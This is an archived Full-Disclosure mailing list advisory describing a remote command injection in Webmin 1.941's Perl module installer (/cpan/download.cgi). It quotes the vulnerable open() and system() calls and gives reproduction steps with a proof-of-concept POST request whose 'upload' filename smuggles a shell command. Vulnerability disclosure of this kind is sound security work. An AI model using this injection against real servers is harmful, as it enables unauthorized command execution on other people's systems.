lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 6 May 2020 08:47:23 +0200
From: raki ben hamouda <>
To: "" <>,
 Packet Storm <>, 
 "" <>
Subject: [FD] Webmin (Upload Module) Remote Command Injection Vulnerability

Document Title:
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability

Common Vulnerability Scoring System:

Vulnerability Class:
Command Injection

Current Estimated Price:
2.000€ - 3.000€

Affected Product(s):

Exploitation Technique:

Severity Level:

Technical Details & Description:
A remote authenticated Command Injection vulnerability has been discovered
in the official Webmin product .
The security vulnerability allows a remote attacker with only permission to
"Install Module Perl Component"
to execute arbitrary Operating System Commands.
this is due to no check performed on the user input "upload" parameter when
it passed to open() perl function
causing execution of any command .

The vulnerability is located in the `/cpan/download.cgi` modules and the
`upload` parameter
of the module name to install.

The security risk of the arbitrary RCE vulnerability is estimated as High
with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the RCE web vulnerability requires a low privilege
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

##When digging in code :

I needed only to reach this line code to make it work :

&install_error(&text('download_etar', "<tt>$tar</tt>"));

However passing user input directly to open() is not a solution, this
includes also all these lines :

    open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
    system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
    system("$cmd >/dev/null 2>&1 </dev/null");
    %needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;


Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /cpan/download.cgi

Vulnerable Parameter(s):
[+] upload

Server version

Proof of Concept (PoC):
The security vulnerability can be exploited by remote attackers with low
privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

1-Attacker must have permission to the Install Perl Modules component
2-Go to "Others"->"Perl Modules"->"Install Modules"->Select 'From Uploaded
File'->Pick Any file
3-attacker intercepts the request that follows :

--- PoC Session Logs [POST] ---

POST /cpan/download.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 682
Connection: close
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7

Content-Disposition: form-data; name="cpan"

Content-Disposition: form-data; name="local"

Content-Disposition: form-data; name="source"

Content-Disposition: form-data; name="upload"; filename="file | ls -l &&
Content-Type: [nothing here]

[Nothing Here]
Content-Disposition: form-data; name="url"


4-Modify the "upload" parameter with string : "file | ls -l && err"

##Successfully reproduced the Vulnerability.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists